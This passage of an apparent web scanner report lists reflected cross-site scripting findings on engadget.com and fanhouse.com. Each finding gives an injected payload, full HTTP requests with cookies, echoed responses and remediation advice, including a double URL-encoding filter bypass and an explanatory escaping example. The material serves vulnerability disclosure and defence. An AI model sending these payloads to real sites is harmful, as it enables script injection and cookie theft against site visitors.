The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Sonos74867%253cscript%253ealert%25281%2529%253c%252fscript%253e792e0f3d945/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9833e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2bf6fe5582 was submitted in the REST URL parameter 2. This input was echoed as 9833e\"><script>alert(1)</script>e2bf6fe5582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Sonos9833e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2bf6fe5582/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eb95037106 was submitted in the REST URL parameter 2. This input was echoed as 61e73\"><script>alert(1)</script>9eb95037106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/askengadget61e73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eb95037106 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdbd2%253cscript%253ealert%25281%2529%253c%252fscript%253eeaa78b61619 was submitted in the REST URL parameter 2. This input was echoed as bdbd2<script>alert(1)</script>eaa78b61619 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/askengadgetbdbd2%253cscript%253ealert%25281%2529%253c%252fscript%253eeaa78b61619 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9412c%253cscript%253ealert%25281%2529%253c%252fscript%253e3c7d442946f was submitted in the REST URL parameter 2. This input was echoed as 9412c<script>alert(1)</script>3c7d442946f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htc9412c%253cscript%253ealert%25281%2529%253c%252fscript%253e3c7d442946f HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcbb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b4dc45fda was submitted in the REST URL parameter 2. This input was echoed as fcbb6\"><script>alert(1)</script>52b4dc45fda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htcfcbb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b4dc45fda HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2474%253cscript%253ealert%25281%2529%253c%252fscript%253eb25362d2e8d was submitted in the REST URL parameter 2. This input was echoed as f2474<script>alert(1)</script>b25362d2e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htc,legendf2474%253cscript%253ealert%25281%2529%253c%252fscript%253eb25362d2e8d HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b36a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e567c0a8e367 was submitted in the REST URL parameter 2. This input was echoed as 3b36a\"><script>alert(1)</script>567c0a8e367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htc,legend3b36a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e567c0a8e367 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e154acd0c317 was submitted in the REST URL parameter 2. This input was echoed as 12d2b\"><script>alert(1)</script>154acd0c317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mta12d2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e154acd0c317 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 698db%253cscript%253ealert%25281%2529%253c%252fscript%253e4657951d7a8 was submitted in the REST URL parameter 2. This input was echoed as 698db<script>alert(1)</script>4657951d7a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mta698db%253cscript%253ealert%25281%2529%253c%252fscript%253e4657951d7a8 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d284e2c8a was submitted in the REST URL parameter 2. This input was echoed as 6c10d\"><script>alert(1)</script>3d284e2c8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mwc6c10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d284e2c8a HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1610d%253cscript%253ealert%25281%2529%253c%252fscript%253e283ed52bb18 was submitted in the REST URL parameter 2. This input was echoed as 1610d<script>alert(1)</script>283ed52bb18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mwc1610d%253cscript%253ealert%25281%2529%253c%252fscript%253e283ed52bb18 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c027e%253cscript%253ealert%25281%2529%253c%252fscript%253eae22f2cd84c was submitted in the REST URL parameter 2. This input was echoed as c027e<script>alert(1)</script>ae22f2cd84c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/qrcodec027e%253cscript%253ealert%25281%2529%253c%252fscript%253eae22f2cd84c HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33e62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3348f81a0eb was submitted in the REST URL parameter 2. This input was echoed as 33e62\"><script>alert(1)</script>3348f81a0eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/qrcode33e62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3348f81a0eb HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 775e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04f1a218fe4 was submitted in the REST URL parameter 2. This input was echoed as 775e9\"><script>alert(1)</script>04f1a218fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/shocker775e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04f1a218fe4 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11961%253cscript%253ealert%25281%2529%253c%252fscript%253e14990835019 was submitted in the REST URL parameter 2. This input was echoed as 11961<script>alert(1)</script>14990835019 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/shocker11961%253cscript%253ealert%25281%2529%253c%252fscript%253e14990835019 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f9ec%253cscript%253ealert%25281%2529%253c%252fscript%253ee8cf4f0c4f2 was submitted in the REST URL parameter 2. This input was echoed as 4f9ec<script>alert(1)</script>e8cf4f0c4f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/xxxe42f9%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e9716d68035d4f9ec%253cscript%253ealert%25281%2529%253c%252fscript%253ee8cf4f0c4f2 HTTP/1.1
Host: www.engadget.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b682; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b682; s_pers=%20s_getnr%3D1297024747837-Repeat%7C1360096747837%3B%20s_nrgvo%3DRepeat%7C1360096747839%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </script>9716d68035d4f9ec<script>alert(1)</script>e8cf4f0c4f2</em> ...[SNIP]...
1.561. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b80"><script>alert(1)</script>abb790fc786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?44b80"><script>alert(1)</script>abb790fc786=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/?44b80"><script>alert(1)</script>abb790fc786=1"/> ...[SNIP]...
1.562. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9308"-alert(1)-"caa87257aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f9308"-alert(1)-"caa87257aff=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
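Why the "-alert(1)-" payload in this finding executes, as an added example that is not code from fanhouse.com or from this report. The payload closes the double-quoted string literal, and the two minus signs turn what follows into a valid arithmetic expression, so the browser evaluates alert(1) while running the script block; no angle brackets are needed, which is why HTML encoding alone does not address this context. The variable name s_pageName and the script template are assumptions for illustration (the report only shows that the echo lands inside a script block). The block also shows the safe way to embed the value when it cannot be avoided, and runs both versions with a stand-in alert() that records calls instead of opening a dialog.

```javascript
// Added example, not code from the scanned application.

// Vulnerable template: raw string concatenation into a script block.
// (Variable name is an assumption.)
function vulnerableScript(value) {
  return `var s_pageName = "${value}";`;
}

// Safe template: JSON.stringify yields a valid JS string literal, and the
// extra replacements stop "</script>", "<!--" and the JS line terminators
// U+2028/U+2029 from breaking out of the surrounding <script> element.
function safeScript(value) {
  const literal = JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return `var s_pageName = ${literal};`;
}

// Run a generated script with a recording stand-in for alert() and report
// the value the script assigned. Syntax errors are reported, not thrown.
function execute(script) {
  const alertCalls = [];
  let value;
  let error = null;
  try {
    const fn = new Function('alert', `${script}\nreturn s_pageName;`);
    value = fn((x) => { alertCalls.push(x); });
  } catch (e) {
    error = e.constructor.name;
  }
  return { alertCalls, value, error };
}

// Constructed input: the parameter name submitted in this finding.
const PAYLOAD = 'f9308"-alert(1)-"caa87257aff';

function demo() {
  const vulnerable = vulnerableScript(PAYLOAD);
  const safe = safeScript(PAYLOAD);
  return {
    vulnerable: { script: vulnerable, ...execute(vulnerable) }, // alert called with 1
    safe: { script: safe, ...execute(safe) },                   // value === PAYLOAD, no alert
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the vulnerable run the generated statement is var s_pageName = "f9308"-alert(1)-"caa87257aff"; the spy records the call and the variable ends up as NaN, which is exactly the behaviour a real browser shows. In the safe run the quotes are escaped inside the literal and the assigned value is the original payload string, untouched.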
1.563. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58941"><script>alert(1)</script>398c3e79241 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?58941"><script>alert(1)</script>398c3e79241=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?58941"><script>alert(1)</script>398c3e79241=1"/> ...[SNIP]...
1.564. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff00e"-alert(1)-"bca20dfc346 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?ff00e"-alert(1)-"bca20dfc346=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
var s_code=s_265.t();if(s_code)document ...[SNIP]...
1.565. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84204"><script>alert(1)</script>3f4f242397f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?84204"><script>alert(1)</script>3f4f242397f=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?84204"><script>alert(1)</script>3f4f242397f=1"/> ...[SNIP]...
1.566. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f45e"-alert(1)-"7ca944951cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?9f45e"-alert(1)-"7ca944951cf=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.567. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]
